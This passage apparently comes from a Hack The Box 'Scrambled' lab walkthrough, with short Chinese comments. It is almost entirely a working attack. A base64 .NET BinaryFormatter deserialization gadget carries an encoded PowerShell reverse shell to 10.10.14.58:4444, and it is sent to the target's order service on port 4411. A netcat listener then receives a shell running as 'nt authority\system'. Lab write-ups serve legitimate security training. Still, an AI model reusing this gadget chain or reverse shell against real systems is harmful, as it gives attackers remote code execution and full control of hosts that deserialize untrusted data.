AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAANMIAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA9Q88P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIHBvd2Vyc2hlbGwgLWUgSkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU1RQXdBQzRBTVFBd0FDNEFNUUEwQUM0QU5RQTRBQ0lBTEFBMEFEUUFOQUEwQUNrQU93QWtBSE1BZEFCeUFHVUFZUUJ0QUNBQVBRQWdBQ1FBWXdCc0FHa0FaUUJ1QUhRQUxnQkhBR1VBZEFCVEFIUUFjZ0JsQUdFQWJRQW9BQ2tBT3dCYkFHSUFlUUIwQUdVQVd3QmRBRjBBSkFCaUFIa0FkQUJsQUhNQUlBQTlBQ0FBTUFBdUFDNEFOZ0ExQURVQU13QTFBSHdBSlFCN0FEQUFmUUE3QUhjQWFBQnBBR3dBWlFBb0FDZ0FKQUJwQUNBQVBRQWdBQ1FBY3dCMEFISUFaUUJoQUcwQUxnQlNBR1VBWVFCa0FDZ0FKQUJpQUhrQWRBQmxBSE1BTEFBZ0FEQUFMQUFnQUNRQVlnQjVBSFFBWlFCekFDNEFUQUJsQUc0QVp3QjBBR2dBS1FBcEFDQUFMUUJ1QUdVQUlBQXdBQ2tBZXdBN0FDUUFaQUJoQUhRQVlRQWdBRDBBSUFBb0FFNEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUF0QUZRQWVRQndBR1VBVGdCaEFHMEFaUUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFWQUJsQUhnQWRBQXVBRUVBVXdCREFFa0FTUUJGQUc0QVl3QnZBR1FBYVFCdUFHY0FLUUF1QUVjQVpRQjBBRk1BZEFCeUFHa0FiZ0JuQUNnQUpBQmlBSGtBZEFCbEFITUFMQUF3QUN3QUlBQWtBR2tBS1FBN0FDUUFjd0JsQUc0QVpBQmlBR0VBWXdCckFDQUFQUUFnQUNnQWFRQmxBSGdBSUFBa0FHUUFZUUIwQUdFQUlBQXlBRDRBSmdBeEFDQUFmQUFnQUU4QWRRQjBBQzBBVXdCMEFISUFhUUJ1QUdjQUlBQXBBRHNBSkFCekFHVUFiZ0JrQUdJQVlRQmpBR3NBTWdBZ0FEMEFJQUFrQUhNQVpRQnVBR1FBWWdCaEFHTUFhd0FnQUNzQUlBQWlBRkFBVXdBZ0FDSUFJQUFyQUNBQUtBQndBSGNBWkFBcEFDNEFVQUJoQUhRQWFBQWdBQ3NBSUFBaUFENEFJQUFpQURzQUpBQnpBR1VBYmdCa0FHSUFlUUIwQUdVQUlBQTlBQ0FBS0FCYkFIUUFaUUI0QUhRQUxnQmxBRzRBWXdCdkFHUUFhUUJ1QUdjQVhRQTZBRG9BUVFCVEFFTUFTUUJKQUNrQUxnQkhBR1VBZEFCQ0FIa0FkQUJsQUhNQUtBQWtBSE1BWlFCdUFHUUFZZ0JoQUdNQWF3QXlBQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQzRBVndCeUFHa0FkQUJsQUNnQUpBQnpBR1VBYmdCa0FHSUFlUUIwQUdVQUxBQXdBQ3dBSkFCekFHVUFiZ0JrQUdJQWVRQjBBR1VBTGdCTUFHVUFiZ0JuQUhRQWFBQXBBRHNBSkFCekFIUUFjZ0JsQUdFQWJRQXVBRVlBYkFCMUFITUFhQUFvQUNrQWZRQTdBQ1FBWXdCc0FHa0FaUUJ1QUhRQUxnQkRBR3dBYndCekFHVUFLQUFwQUE9PSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4LCw==
#开启监听
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
#发送反序列化payload
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# nc 10.129.161.177 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAANMIAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA9Q88P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIHBvd2Vyc2hlbGwgLWUgSkFCakFHd0FhUUJsQUc0QWRBQWdBRDBBSUFCT0FHVUFkd0F0QUU4QVlnQnFBR1VBWXdCMEFDQUFVd0I1QUhNQWRBQmxBRzBBTGdCT0FHVUFkQUF1QUZNQWJ3QmpBR3NBWlFCMEFITUFMZ0JVQUVNQVVBQkRBR3dBYVFCbEFHNEFkQUFvQUNJQU1RQXdBQzRBTVFBd0FDNEFNUUEwQUM0QU5RQTRBQ0lBTEFBMEFEUUFOQUEwQUNrQU93QWtBSE1BZEFCeUFHVUFZUUJ0QUNBQVBRQWdBQ1FBWXdCc0FHa0FaUUJ1QUhRQUxnQkhBR1VBZEFCVEFIUUFjZ0JsQUdFQWJRQW9BQ2tBT3dCYkFHSUFlUUIwQUdVQVd3QmRBRjBBSkFCaUFIa0FkQUJsQUhNQUlBQTlBQ0FBTUFBdUFDNEFOZ0ExQURVQU13QTFBSHdBSlFCN0FEQUFmUUE3QUhjQWFBQnBBR3dBWlFBb0FDZ0FKQUJwQUNBQVBRQWdBQ1FBY3dCMEFISUFaUUJoQUcwQUxnQlNBR1VBWVFCa0FDZ0FKQUJpQUhrQWRBQmxBSE1BTEFBZ0FEQUFMQUFnQUNRQVlnQjVBSFFBWlFCekFDNEFUQUJsQUc0QVp3QjBBR2dBS1FBcEFDQUFMUUJ1QUdVQUlBQXdBQ2tBZXdBN0FDUUFaQUJoQUhRQVlRQWdBRDBBSUFBb0FFNEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUF0QUZRQWVRQndBR1VBVGdCaEFHMEFaUUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFWQUJsQUhnQWRBQXVBRUVBVXdCREFFa0FTUUJGQUc0QVl3QnZBR1FBYVFCdUFHY0FLUUF1QUVjQVpRQjBBRk1BZEFCeUFHa0FiZ0JuQUNnQUpBQmlBSGtBZEFCbEFITUFMQUF3QUN3QUlBQWtBR2tBS1FBN0FDUUFjd0JsQUc0QVpBQmlBR0VBWXdCckFDQUFQUUFnQUNnQWFRQmxBSGdBSUFBa0FHUUFZUUIwQUdFQUlBQXlBRDRBSmdBeEFDQUFmQUFnQUU4QWRRQjBBQzBBVXdCMEFISUFhUUJ1QUdjQUlBQXBBRHNBSkFCekFHVUFiZ0JrQUdJQVlRQmpBR3NBTWdBZ0FEMEFJQUFrQUhNQVpRQnVBR1FBWWdCaEFHTUFhd0FnQUNzQUlBQWlBRkFBVXdBZ0FDSUFJQUFyQUNBQUtBQndBSGNBWkFBcEFDNEFVQUJoQUhRQWFBQWdBQ3NBSUFBaUFENEFJQUFpQURzQUpBQnpBR1VBYmdCa0FHSUFlUUIwQUdVQUlBQTlBQ0FBS0FCYkFIUUFaUUI0QUhRQUxnQmxBRzRBWXdCdkFHUUFhUUJ1QUdjQVhRQTZBRG9BUVFCVEFFTUFTUUJKQUNrQUxnQkhBR1VBZEFCQ0FIa0FkQUJsQUhNQUtBQWtBSE1BWlFCdUFHUUFZZ0JoQUdNQWF3QXlBQ2tBT3dBa0FITUFkQUJ5QUdVQVlRQnRBQzRBVndCeUFHa0FkQUJsQUNnQUpBQnpBR1VBYmdCa0FHSUFlUUIwQUdVQUxBQXdBQ3dBSkFCekFHVUFiZ0JrQUdJQWVRQjBBR1VBTGdCTUFHVUFiZ0JuQUhRQWFBQXBBRHNBSkFCekFIUUFjZ0JsQUdFQWJRQXVBRVlBYkFCMUFITUFhQUFvQUNrQWZRQTdBQ1FBWXdCc0FHa0FaUUJ1QUhRQUxnQkRBR3dBYndCekFHVUFLQUFwQUE9PSIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4LCw==
ERROR_GENERAL;Error deserializing sales order: Unable to cast object of type 'State' to type 'ScrambleLib.SalesOrder'.
┌──(root㉿kali)-[~/Desktop/htb/Scrambled]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.58] from (UNKNOWN) [10.129.161.177] 52769
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>